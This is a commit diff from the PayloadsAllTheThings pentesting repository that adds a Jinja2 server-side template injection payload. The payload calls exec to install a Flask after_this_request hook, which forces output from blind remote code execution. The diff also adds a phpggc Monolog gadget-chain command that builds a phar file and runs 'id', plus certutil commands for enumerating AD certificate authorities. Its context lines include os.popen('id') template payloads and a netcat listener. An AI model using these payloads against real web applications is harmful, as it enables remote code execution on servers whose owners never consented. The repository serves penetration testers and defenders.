Blind SSTI Jinja

This commit is contained in:
Swissky 2022-10-02 12:24:39 +02:00
parent 444d8ad169
commit 4ed3e3b6b9
4 changed files with 22 additions and 6 deletions

View File

@ -133,6 +133,7 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
```powershell ```powershell
phpggc monolog/rce1 'phpinfo();' -s phpggc monolog/rce1 'phpinfo();' -s
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
``` ```
## PHP Phar Deserialization ## PHP Phar Deserialization

View File

@ -2225,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local
* Find ADCS Server * Find ADCS Server
* `crackmapexec ldap domain.lab -u username -p password -M adcs` * `crackmapexec ldap domain.lab -u username -p password -M adcs`
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump`
#### ESC1 - Misconfigured Certificate Templates #### ESC1 - Misconfigured Certificate Templates

View File

@ -9,7 +9,7 @@ You can also contribute with a :beers: IRL, or using the sponsor button
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/. An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).
<p align="center"> <p align="center">
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png"> <img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">

View File

@ -43,6 +43,7 @@
- [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) - [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
@ -496,15 +497,30 @@ Listen for connection
nc -lnvp 8000 nc -lnvp 8000
``` ```
#### Jinja2 - Forcing output on blind RCE
You can import Flask functions to return an output from the vulnerable page.
```py
{{
x.__init__.__builtins__.exec("from flask import current_app, after_this_request
@after_this_request
def hook(*args, **kwargs):
from flask import make_response
r = make_response('Powned')
return r
")
}}
```
#### Exploit the SSTI by calling os.popen().read() #### Exploit the SSTI by calling os.popen().read()
These payloads are context-free, and do not require anything, except being in a jinja2 Template object: These payloads are context-free, and do not require anything, except being in a jinja2 Template object:
```python ```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
@ -512,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet):
```python ```python
{{ cycler.__init__.__globals__.os.popen('id').read() }} {{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }} {{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }} {{ namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
@ -1092,3 +1106,4 @@ layout template:
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)